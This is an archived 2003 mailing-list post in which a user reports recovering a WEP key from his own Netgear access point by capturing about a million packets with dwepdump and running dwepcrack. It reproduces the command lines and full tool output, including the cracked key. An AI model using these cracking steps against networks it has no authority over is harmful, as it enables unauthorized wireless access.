dwepcrack DOES !!
tye <[email protected]> Fri, 4 Apr 2003 18:31:50 -0600 (CST)
| Newsgroups | gmane.network.wireless.bsd.airtools |
|---|---|
| Message-ID | <[email protected]> |
Finally, I've been able to crack some WEP keys. Took capturing 65mb of traffic using dwepdump and then thirty seconds with dwepcrack to come up with the key. I used a netgear ME102 access point with a netgear MA401 client pc card. Copying a 64mb file in a continuous loop for about 24 hours. So based on my experience so far I would assume that this Netgear equipment is not doing weak iv filtering. It looks like it took just about a million packets to get enough weak iv's. tye # ./dwepcrack -w -f4 /usr/local/sbin/netgear1 * dwepcrack v0.4 by h1kari <[email protected]> * * Copyright (c) Dachb0den Labs 2002 [http://dachb0den.com] * reading in captured ivs, snap headers, and samples... done total packets: 59077 calculating ksa probabilities... 0: 33/768 keys (!) 1: 6069/131328 keys (!) 2: 6018/197376 keys (!) 3: 3037/197120 keys (!) 4: 2991/328703 keys (!) (!) insufficient ivs, must have > 60 for each key (!) (!) probability of success for each key with (!) < 0.5 (!) warming up the grinder... packet length: 44 init vector: 19:e8:69 default tx key: 0 progress: ...................................................................... ................................................................................ ................................................................................ ...................................................................... wep keys successfully cracked! 0: c8:ae:47:11:a3 * done. # # dwepdump -w wi0 netgear1 * dwepdump v0.2 by h1kari <[email protected]> * * Copyright (c) Dachb0den Labs 2002 [http://dachb0den.com] * starting pcap capture loop... device: wi0 logfile: netgear1 0.31 1:2436 2:35c4 :: 1158813 stopping pcap capture loop...